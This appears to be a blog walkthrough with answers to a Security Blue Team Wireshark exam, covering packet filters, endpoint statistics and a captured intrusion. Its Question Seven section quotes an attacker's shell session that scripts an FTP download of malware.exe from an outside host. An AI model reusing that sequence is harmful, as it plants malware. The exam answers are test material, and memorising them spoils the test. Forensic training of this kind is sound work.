
Security Blue Team Wireshark Exam Walkthrough


Hi there! I am a curious techie. My spare time is spent with books.

Introduction

I recently wrote and passed the Wireshark exam from the Security Blue Team with a 9/9 mark.

This was part of my Networking sub-path.

It was a deeply practical experience from A to Z, as I had to work with two Wireshark PCAP files.

It tested my knowledge of core networking itself, display filters, packet statistics, critical thinking, and investigation of networking depths.

For instance, one of the questions asked for a password embedded into a network packet; my knowledge of network protocols allowed me to filter for protocols that allowed clear-text communications, where I found the answer.

As is typical of me and my knack for documentation, I documented the entire process and the answers to each question. Yes, I was that confident!😀

I not only wrote down the answers to the Wireshark questions, but also explained the logic behind them; not doing that would be a great disservice to whoever finds it.

This is to ensure that when you are stuck and go through my solution, you not only find an answer but can explain it, understand it, and reverse engineer the process as if it were a textbook on Wireshark.

This is the documentation, and I hope you find it useful. If you do, use the comments to let me know; I will be happy to hear from you.

Question One: PCAP1 - Which protocol was used over port 3942?

As seen from the screenshot, to find the answer I first used the common display filter for searching by port number, tcp.port==3942. This returned nothing, so I switched to the other transport protocol, UDP.

With udp.port==3942, Wireshark returned five packets, all of them SSDP, indicating that SSDP was the protocol used over port 3942 (UDP).

Answer: SSDP

Question Two: PCAP1 - What is the IP Address of the host that was pinged twice?

This can easily fool you into choosing 92.168.1.7, which is the most obvious candidate, but you MUST check for successful pings (an echo request that actually received a reply), as that is what counts.

Looking carefully, we can see four packets with consistent success (request and reply, twice), and when we investigate the host the question asks about, by double-clicking each of those packets, we find that 8.8.4.4 is the host that was pinged twice.

All I had to do was input icmp into the filter field, then look.

Answer: 8.8.4.4

Question Three: PCAP1 - How many DNS query response packets were captured?

For this, I used the dns.flags.response==1 display filter. Getting this right means that you must know what that filter does.

Our question is asking for the number of RESPONSE packets, and response==1 in this filter tells Wireshark to show only packets whose DNS response flag equals 1, in other words packets that are responses (answers) rather than queries.

Typing in the filter dns.flags.response==1 will display a total of 90 packets.

Answer: 90
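To make the flag test concrete, here is an added example (my own code, not part of the walkthrough or of Wireshark) that builds a few constructed DNS messages, decodes the header bits that dns.flags.response and dns.flags.rcode expose, and counts responses the way the display filter does. It also shows the caveat the question hides: a response flag of 1 says the packet is an answer, not that the answer was successful, so an NXDOMAIN reply still counts. The transaction IDs and names are made up.

```python
import struct

# RFC 1035 header: ID, FLAGS, QDCOUNT, ANCOUNT, NSCOUNT, ARCOUNT (six 16-bit fields).
QR_BIT = 15          # 1 = response, 0 = query
RCODE_MASK = 0x000F  # 0 = NOERROR, 3 = NXDOMAIN, ...

def build_dns(txid, is_response, rcode=0, ancount=0):
    """Build a minimal DNS message for example.com (constructed test data, not exam traffic)."""
    flags = (1 << QR_BIT if is_response else 0) | (1 << 8) | (rcode & RCODE_MASK)  # QR | RD | RCODE
    header = struct.pack("!HHHHHH", txid, flags, 1, ancount, 0, 0)
    question = b"\x07example\x03com\x00" + b"\x00\x01" + b"\x00\x01"  # QNAME, QTYPE=A, QCLASS=IN
    return header + question

# Constructed UDP payloads as the dns.* filters would see them: three queries and two
# responses, one of which is an NXDOMAIN error; the last query never gets an answer.
SAMPLE_DNS_PAYLOADS = [
    build_dns(0x1A2B, is_response=False),
    build_dns(0x1A2B, is_response=True, ancount=1),     # NOERROR answer
    build_dns(0x3C4D, is_response=False),
    build_dns(0x3C4D, is_response=True, rcode=3),       # NXDOMAIN: still a response
    build_dns(0x5E6F, is_response=False),               # unanswered query
]

def parse_dns_flags(payload):
    """Return the header fields that dns.flags.response and dns.flags.rcode expose."""
    if len(payload) < 12:
        raise ValueError("DNS header is 12 bytes; payload too short")
    txid, flags = struct.unpack("!HH", payload[:4])
    return {
        "id": txid,
        "response": (flags >> QR_BIT) & 1,
        "opcode": (flags >> 11) & 0xF,
        "rcode": flags & RCODE_MASK,
    }

def count_responses(payloads, successful_only=False):
    """Equivalent of dns.flags.response == 1 (optionally && dns.flags.rcode == 0)."""
    total = 0
    for p in payloads:
        f = parse_dns_flags(p)
        if f["response"] != 1:
            continue
        if successful_only and f["rcode"] != 0:
            continue
        total += 1
    return total

def unanswered_queries(payloads):
    """Transaction IDs of queries with no matching response (goes beyond the exam question)."""
    queries, responses = set(), set()
    for p in payloads:
        f = parse_dns_flags(p)
        (responses if f["response"] else queries).add(f["id"])
    return sorted(queries - responses)

if __name__ == "__main__":
    print("responses:", count_responses(SAMPLE_DNS_PAYLOADS))                     # 2
    print("successful responses:", count_responses(SAMPLE_DNS_PAYLOADS, True))    # 1
    print("unanswered:", [hex(i) for i in unanswered_queries(SAMPLE_DNS_PAYLOADS)])
```

On the sample data the plain count is 2 while the successful-only count is 1, which is exactly the difference between dns.flags.response==1 and dns.flags.response==1 && dns.flags.rcode==0 in Wireshark. The unanswered-query check is a cheap extra that often points at blocked or sinkholed lookups in a real capture.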

Question Four: PCAP1 - What is the IP address of the host which sent the most number of bytes?

Statistics time!

You don’t need a filter for this. Just open Statistics, click Endpoints, then click the IPv4 tab, because we are looking for IPv4 addresses.

This too is a tricky question, but when you analyze it, it is asking for a BYTE amount, and understanding Tx and Rx bytes tells you which column holds the answer.

Tx bytes is the total number of bytes SENT.

Rx bytes is the total number of bytes RECEIVED.

Now, you see? We judge by Tx bytes, as seen in my screenshot below.

Answer: 115.178.9.18
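The Endpoints table is just per-address counters, so here is an added example (my own code, not the walkthrough's and not Wireshark's implementation) that builds a constructed set of raw IPv4 packets, parses the source and destination addresses, and tallies the same Packets, Bytes, Tx and Rx columns. The sample traffic is arranged so that the biggest sender, the biggest receiver and the biggest total differ, which is the trap this question sets. Addresses are RFC 5737 documentation ranges and the frames carry no link-layer header, so a frame's length is its IP total length.

```python
import struct
import ipaddress
from collections import defaultdict

def build_ipv4(src, dst, payload_len, proto=17):
    """Construct a raw IPv4 packet (20-byte header, zero checksum) carrying payload_len dummy bytes."""
    total_len = 20 + payload_len
    header = struct.pack("!BBHHHBBH4s4s",
                         0x45, 0, total_len, 0, 0x4000, 64, proto, 0,
                         ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    return header + b"\x00" * payload_len

# Constructed capture: 192.0.2.1 uploads a lot to 203.0.113.10, which only sends small
# acknowledgements back; 192.0.2.2 uploads a little less; 198.51.100.7 sends one packet.
SAMPLE_FRAMES = (
    [build_ipv4("192.0.2.1", "203.0.113.10", 1400)] * 3
    + [build_ipv4("203.0.113.10", "192.0.2.1", 60)] * 3
    + [build_ipv4("192.0.2.2", "203.0.113.10", 1000)] * 2
    + [build_ipv4("198.51.100.7", "192.0.2.2", 200)]
)

def parse_ipv4(frame):
    """Return (src, dst, frame_length) or None when the frame is not IPv4."""
    if len(frame) < 20 or frame[0] >> 4 != 4:
        return None
    src = str(ipaddress.IPv4Address(frame[12:16]))
    dst = str(ipaddress.IPv4Address(frame[16:20]))
    return src, dst, len(frame)

def endpoint_stats(frames):
    """Per-address counters mirroring the Endpoints > IPv4 columns (Packets, Bytes, Tx, Rx)."""
    cols = ("packets", "bytes", "tx_packets", "tx_bytes", "rx_packets", "rx_bytes")
    stats = defaultdict(lambda: dict.fromkeys(cols, 0))
    for frame in frames:
        parsed = parse_ipv4(frame)
        if parsed is None:
            continue
        src, dst, length = parsed
        # The source endpoint transmitted the frame, the destination endpoint received it.
        for addr, direction in ((src, "tx"), (dst, "rx")):
            row = stats[addr]
            row["packets"] += 1
            row["bytes"] += length
            row[f"{direction}_packets"] += 1
            row[f"{direction}_bytes"] += length
    return dict(stats)

def top_endpoint(stats, column):
    """Address with the highest value in the given column, e.g. 'tx_bytes' for 'sent the most bytes'."""
    return max(stats, key=lambda addr: stats[addr][column])

if __name__ == "__main__":
    s = endpoint_stats(SAMPLE_FRAMES)
    for addr, row in sorted(s.items(), key=lambda kv: -kv[1]["tx_bytes"]):
        print(addr, row)
    print("most bytes sent:    ", top_endpoint(s, "tx_bytes"))   # 192.0.2.1
    print("most bytes received:", top_endpoint(s, "rx_bytes"))   # 203.0.113.10
    print("most bytes overall: ", top_endpoint(s, "bytes"))      # 203.0.113.10, the trap
```

Sorting the Endpoints window by its default Bytes column would hand you 203.0.113.10 here, because Bytes is Tx plus Rx; only the Tx Bytes column answers "which host sent the most".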

Now, we switch to the second PCAP, and the questions become a bit tougher.

Question Five: PCAP2 - What is the WebAdmin password?

Well, run http contains "WebAdmin" to see packets with WebAdmin in them.

The logic is rooted in the fact that we wouldn’t be asked for a password unless it was already in plaintext, so I had to use the protocols I knew allowed plaintext communication: FTP and HTTP. HTTP was the one; on following the HTTP stream, I saw the password, in PLAINTEXT!

Answer: sbt123

Question Six: PCAP2 - What is the version number of the attacker’s FTP server?

We are looking at an FTP server, and its version number. Since FTP sends messages in plaintext, I typed in ftp into my filter field and saw what looked like a version number, alongside the FTP server’s name.

Looks simple, but you need to understand networking and its protocols to be able to understand this.

Answer: 1.5.5

Question Seven: PCAP2 - Which port was used to gain access to the victim Windows host?

Yoo, some hacking time.

Well, I won’t lie, I got stuck here for some time, longer than on the other questions, but later realized that it was simple: the default shell for Windows is CMD or PowerShell, and hackers love it. So, if it was remote access, I guessed they did it over a transport layer protocol, TCP or UDP.

And then I did: tcp contains "cmd". This gave me just two packets. Following them both, I saw something fishy, which made me dig deeper by following the TCP stream of the first, and I saw command execution! Whoa, that’s good evidence.

I went back, checked the port over which that happened, and got port 8081.

Answer: 8081

So, when I followed the TCP stream, I got this shell execution:

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\IEUser>
cd Desktop

cd Desktop

C:\Users\IEUser\Desktop>
dir

dir
Volume in drive C is Windows 7
Volume Serial Number is 3C9E-098B

Directory of C:\Users\IEUser\Desktop

02/08/2020  04:07 PM    <DIR>          .
02/08/2020  04:07 PM    <DIR>          ..

09/16/2019  05:22 PM                 0 .lock
08/22/2019  04:59 AM            30,000 BOF.m3u
04/20/1997  03:43 PM             9,728 CODBCLog.dll
12/04/1995  02:08 PM            27,136 Ctl3d32.dll.nt
01/31/1996  01:28 PM            26,624 Ctl3d32.dll.Win95
08/20/2019  01:40 AM             1,041 Easy RM to MP3 Converter.lnk
08/22/2019  04:59 AM               107 EasyRM.py
02/08/2020  03:44 PM               379 Employee_Information_CONFIDENTIAL.txt
01/02/2018  05:21 PM               830 eula.lnk
08/16/2019  06:38 PM             2,347 faq.html
09/13/2019  04:41 PM               961 FreeSSHd.lnk
07/16/2019  04:50 AM                64 FtpDaemon.dat
09/16/2019  05:22 PM             1,220 FtpDaemon.ini
02/08/2020  04:08 PM                89 ftp_cmd.txt
10/05/2019  06:32 PM            61,440 good-nc.exe
08/16/2019  06:38 PM             6,197 howto.html
08/16/2019  06:42 PM               327 log.txt
06/18/1996  05:19 PM             3,072 log.wav
07/16/2019  04:51 AM               585 LogFile.log
06/18/1996  05:18 PM             6,248 login.wav
09/13/1996  10:47 AM         1,013,520 Mfc42.dll
08/16/2019  06:38 PM             4,453 mimetypes.ini
08/16/2019  06:38 PM             2,030 minishare.css
08/16/2019  06:38 PM            64,512 minishare.exe
08/16/2019  06:38 PM               261 minishare.ini
08/16/2019  06:46 PM               990 MiniShare.lnk
08/16/2019  06:38 PM                93 motd.txt
06/18/1996  05:12 PM             7,348 msg.wav
08/03/1996  02:00 AM            74,752 Msvcirt.dll
08/03/1996  02:00 AM           267,536 Msvcrt.dll
06/14/1996  07:50 PM            65,024 Msvcrt40.dll
07/16/2019  04:50 AM                83 ODBClog.ini
07/16/2019  04:50 AM                92 ODBClog.log
06/19/1996  04:21 PM            76,048 Olepro32.dll
07/14/1996  10:48 AM             1,496 ProcessZip.cpp
04/19/1997  01:26 PM            41,472 ProcessZip.exe
08/16/2019  06:38 PM               615 readme (2).txt
02/13/1997  01:17 AM             6,295 ReadMe.txt
04/24/1997  04:15 PM            72,436 ReleaseNotes.txt
04/19/1997  02:06 PM           228,352 Setup.exe
04/24/1997  04:16 PM             2,398 Setup.inf
08/22/2019  04:51 AM               185 SocketServer.py
12/11/2019  01:31 AM    <DIR>          source
04/24/1997  11:57 AM                91 sysmsg9.txt
01/26/1997  09:22 AM            35,328 uninstall.exe
04/30/1996  11:06 AM           126,464 unzip.exe
10/05/2019  06:24 PM             1,412 vbscript-wget.txt
08/16/2019  06:38 PM             8,362 version.txt
10/20/1996  10:59 AM             1,508 war-ftpd.cnt
04/24/1997  04:11 PM           388,608 war-ftpd.exe
04/24/1997  04:10 PM         4,292,866 War-ftpd.hlp
10/05/2019  06:31 PM               968 wget.vbs
08/12/2019  11:01 PM    <DIR>          Win32
08/12/2019  11:01 PM    <DIR>          WinCE_ARMV4I
08/12/2019  11:01 PM    <DIR>          WinCE_X86
              51 File(s)      6,963,993 bytes
              6 Dir(s)  24,042,721,280 bytes free

C:\Users\IEUser\Desktop>
echo "open 192.168.56.1" > 1.txt

echo "open 192.168.56.1" > 1.txt

C:\Users\IEUser\Desktop>
echo "USER anonymous" >> 1.txt

echo "USER anonymous" >> 1.txt

C:\Users\IEUser\Desktop>
echo "PASS anonymous" >> 1.txt

echo "PASS anonymous" >> 1.txt

C:\Users\IEUser\Desktop>
echo "binary" >> 1.txt

echo "binary" >> 1.txt

C:\Users\IEUser\Desktop>
echo "GET malware.exe" >> 1.txt

echo "GET malware.exe" >> 1.txt

C:\Users\IEUser\Desktop>
echo "bye" >> 1.txt

echo "bye" >> 1.txt

C:\Users\IEUser\Desktop>
ftp -v -n -s:1.txt

ftp -v -n -s:1.txt
Invalid command.
Invalid command.
Invalid command.
Not connected.
Invalid command.
"open 192.168.56.1"
"USER anonymous"
"PASS anonymous"
"binary"
"GET malware.exe"
"bye"

C:\Users\IEUser\Desktop>
ftp -A 192.168.56.1

ftp -A 192.168.56.1
Anonymous login succeeded for IEUser@IEWIN7

binary
GET malware.exe
bye


C:\Users\IEUser\Desktop>
dir

dir
Volume in drive C is Windows 7
Volume Serial Number is 3C9E-098B

Directory of C:\Users\IEUser\Desktop

02/08/2020  04:14 PM    <DIR>          .
02/08/2020  04:14 PM    <DIR>          ..

09/16/2019  05:22 PM                 0 .lock
02/08/2020  04:13 PM                99 1.txt
08/22/2019  04:59 AM            30,000 BOF.m3u
04/20/1997  03:43 PM             9,728 CODBCLog.dll
12/04/1995  02:08 PM            27,136 Ctl3d32.dll.nt
01/31/1996  01:28 PM            26,624 Ctl3d32.dll.Win95
08/20/2019  01:40 AM             1,041 Easy RM to MP3 Converter.lnk
08/22/2019  04:59 AM               107 EasyRM.py
02/08/2020  03:44 PM               379 Employee_Information_CONFIDENTIAL.txt
01/02/2018  05:21 PM               830 eula.lnk
08/16/2019  06:38 PM             2,347 faq.html
09/13/2019  04:41 PM               961 FreeSSHd.lnk
07/16/2019  04:50 AM                64 FtpDaemon.dat
09/16/2019  05:22 PM             1,220 FtpDaemon.ini
02/08/2020  04:08 PM                89 ftp_cmd.txt
10/05/2019  06:32 PM            61,440 good-nc.exe
08/16/2019  06:38 PM             6,197 howto.html
08/16/2019  06:42 PM               327 log.txt
06/18/1996  05:19 PM             3,072 log.wav
07/16/2019  04:51 AM               585 LogFile.log
06/18/1996  05:18 PM             6,248 login.wav
02/08/2020  04:14 PM            73,802 malware.exe
09/13/1996  10:47 AM         1,013,520 Mfc42.dll
08/16/2019  06:38 PM             4,453 mimetypes.ini
08/16/2019  06:38 PM             2,030 minishare.css
08/16/2019  06:38 PM            64,512 minishare.exe
08/16/2019  06:38 PM               261 minishare.ini
08/16/2019  06:46 PM               990 MiniShare.lnk
08/16/2019  06:38 PM                93 motd.txt
06/18/1996  05:12 PM             7,348 msg.wav
08/03/1996  02:00 AM            74,752 Msvcirt.dll
08/03/1996  02:00 AM           267,536 Msvcrt.dll
06/14/1996  07:50 PM            65,024 Msvcrt40.dll
07/16/2019  04:50 AM                83 ODBClog.ini
07/16/2019  04:50 AM                92 ODBClog.log
06/19/1996  04:21 PM            76,048 Olepro32.dll
07/14/1996  10:48 AM             1,496 ProcessZip.cpp
04/19/1997  01:26 PM            41,472 ProcessZip.exe
08/16/2019  06:38 PM               615 readme (2).txt
02/13/1997  01:17 AM             6,295 ReadMe.txt
04/24/1997  04:15 PM            72,436 ReleaseNotes.txt
04/19/1997  02:06 PM           228,352 Setup.exe
04/24/1997  04:16 PM             2,398 Setup.inf
08/22/2019  04:51 AM               185 SocketServer.py
12/11/2019  01:31 AM    <DIR>          source
04/24/1997  11:57 AM                91 sysmsg9.txt
01/26/1997  09:22 AM            35,328 uninstall.exe
04/30/1996  11:06 AM           126,464 unzip.exe
10/05/2019  06:24 PM             1,412 vbscript-wget.txt
08/16/2019  06:38 PM             8,362 version.txt
10/20/1996  10:59 AM             1,508 war-ftpd.cnt
04/24/1997  04:11 PM           388,608 war-ftpd.exe
04/24/1997  04:10 PM         4,292,866 War-ftpd.hlp
10/05/2019  06:31 PM               968 wget.vbs
08/12/2019  11:01 PM    <DIR>          Win32
08/12/2019  11:01 PM    <DIR>          WinCE_ARMV4I
08/12/2019  11:01 PM    <DIR>          WinCE_X86
              53 File(s)      7,037,894 bytes
              6 Dir(s)  24,042,643,456 bytes free

C:\Users\IEUser\Desktop>
exit

Question Eight: PCAP2 - What is the name of a confidential file that is on the Windows host?

Since our attacker tried to learn every file on the victim’s computer, I searched for anything with ‘confidential’ in it using CTRL + F, as I was using a Windows computer.

Answer: Employee_Information_CONFIDENTIAL.txt

Question Nine: PCAP2 - What is the name of the log file that was created at 4:51 AM on the Windows host?

Using the same CTRL + F on the TCP stream, I found this:

Actually, I searched by the time, which made it faster for me.

Answer: LogFile.log

Well, you see why knowledge of IT is essential in cybersecurity? All I needed to know was that, since the attacker listed all the files on the victim’s device, I just needed to scan that listing using CTRL + F or CMD + F.
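CTRL + F works for two questions, but a captured dir listing is a regular format, so it is worth parsing once and querying for timestamps, names or sizes. Here is an added example (my own code, not from the walkthrough) with a small parser for the cmd.exe dir output shown above; the sample listing is a constructed excerpt in that format, with the file names and timestamps copied from the stream above and the totals recomputed for the excerpt. Beyond the two exam questions it also sorts by timestamp, which is the first thing to do when hunting for files an intruder dropped.

```python
import re
from datetime import datetime

# Constructed excerpt in the format of the cmd.exe "dir" output captured in the TCP stream.
SAMPLE_DIR_LISTING = """\
 Volume in drive C is Windows 7
 Volume Serial Number is 3C9E-098B

 Directory of C:\\Users\\IEUser\\Desktop

02/08/2020  04:14 PM    <DIR>          .
02/08/2020  04:14 PM    <DIR>          ..
09/16/2019  05:22 PM                 0 .lock
02/08/2020  04:13 PM                99 1.txt
02/08/2020  03:44 PM               379 Employee_Information_CONFIDENTIAL.txt
02/08/2020  04:08 PM                89 ftp_cmd.txt
07/16/2019  04:50 AM                64 FtpDaemon.dat
07/16/2019  04:51 AM               585 LogFile.log
02/08/2020  04:14 PM            73,802 malware.exe
12/11/2019  01:31 AM    <DIR>          source
              7 File(s)         75,018 bytes
              3 Dir(s)  24,042,643,456 bytes free
"""

# One dir entry: date, 12-hour time, either <DIR> or a comma-grouped size, then the name.
DIR_LINE = re.compile(
    r"^(?P<date>\d{2}/\d{2}/\d{4})\s+(?P<time>\d{2}:\d{2} [AP]M)\s+"
    r"(?P<size><DIR>|[\d,]+)\s+(?P<name>.+?)\s*$"
)

def parse_dir_listing(text):
    """Turn dir output into dicts with a real datetime, integer size and is_dir flag."""
    entries = []
    for line in text.splitlines():
        m = DIR_LINE.match(line)
        if not m or m["name"] in (".", ".."):
            continue
        entries.append({
            "name": m["name"],
            "when": datetime.strptime(f"{m['date']} {m['time']}", "%m/%d/%Y %I:%M %p"),
            "is_dir": m["size"] == "<DIR>",
            "size": 0 if m["size"] == "<DIR>" else int(m["size"].replace(",", "")),
        })
    return entries

def names_at_time(entries, clock):
    """Files whose timestamp reads exactly `clock` (e.g. '04:51 AM'), on any date."""
    return [e["name"] for e in entries if e["when"].strftime("%I:%M %p") == clock]

def names_containing(entries, keyword):
    """Case-insensitive substring match on the file name, like CTRL + F."""
    return [e["name"] for e in entries if keyword.lower() in e["name"].lower()]

def newest_files(entries, count=1):
    """Most recently modified files: the first place to look for anything an intruder dropped."""
    files = [e for e in entries if not e["is_dir"]]
    return [e["name"] for e in sorted(files, key=lambda e: e["when"], reverse=True)[:count]]

if __name__ == "__main__":
    entries = parse_dir_listing(SAMPLE_DIR_LISTING)
    print("created at 04:51 AM:", names_at_time(entries, "04:51 AM"))
    print("confidential:", names_containing(entries, "confidential"))
    print("newest:", newest_files(entries, 2))
```

Note that dir shows the last-write time, so "created at 4:51 AM" is really "last modified at 4:51 AM" in the listing; for creation times you would need dir /tc on the host itself, which the captured stream does not contain.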

Conclusion

Kindly refrain from copying and pasting this. I went the extra mile to explain my logic so you can actually understand it.

If you have a question, you can comment below or send me a message on X.

Thank you!
